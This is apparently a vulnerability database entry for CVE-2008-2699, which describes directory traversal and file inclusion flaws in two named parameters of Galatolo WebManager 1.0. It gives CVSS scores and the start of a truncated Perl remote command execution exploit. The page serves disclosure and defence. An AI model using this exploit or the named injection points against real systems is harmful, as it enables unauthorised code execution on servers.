7.5
CVSSv2

CVE-2008-2699

Published: 13/06/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple directory traversal vulnerabilities in Galatolo WebManager (GWM) 1.0 allow remote malicious users to include and execute arbitrary local files via directory traversal sequences in (1) the plugin parameter to admin/plugins.php or (2) the com parameter to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

gwm galatolo webmanager 1.0

Exploits

#!/usr/bin/perl # Galatolo Web Manager 10 Remote Command Execution Exploit # by yeat - staker[at]hotmail[dot]it use IO::Socket; use LWP::UserAgent; my ($lwp,$response) = new LWP::UserAgent; my ($host,$path) = @ARGV; if (@ARGV != 2) { print "Galatolo Web Manager 10 Remote Command Execution Exploit\n"; print "by yeat - staker[at]hotmail[ ...